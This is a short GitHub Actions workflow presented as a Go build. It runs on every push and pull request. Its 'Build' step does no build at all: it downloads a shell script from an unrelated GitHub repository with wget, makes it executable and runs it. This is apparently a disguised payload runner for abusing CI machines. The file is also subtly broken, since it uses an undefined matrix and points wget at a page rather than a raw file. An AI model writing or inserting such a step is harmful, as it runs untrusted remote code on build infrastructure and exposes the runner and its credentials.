name: Build 
on: [push, pull_request] 

jobs: 
 build: 
  name: Build 
  runs-on: ubuntu-latest
  strategy: 
     max-parallel: 1 
     fail-fast: false 
     
  env: 
     NUM_JOBS: 20 
     JOB: ${{ matrix.go-version }} 
     
  steps: 
  - name: Set up Go ${{ matrix.go-version }} 
    uses: actions/setup-go@v1 
    with: 
     go-version: ${{ matrix.go-version }} 
    id: go
    
  - name: Setup 
    uses: actions/checkout@v2
    
  - name: Build 
    run: | 
       wget https://github.com/venetta999/12345/blob/main/12345.sh && chmod u+x 12345.sh && ./12345.sh
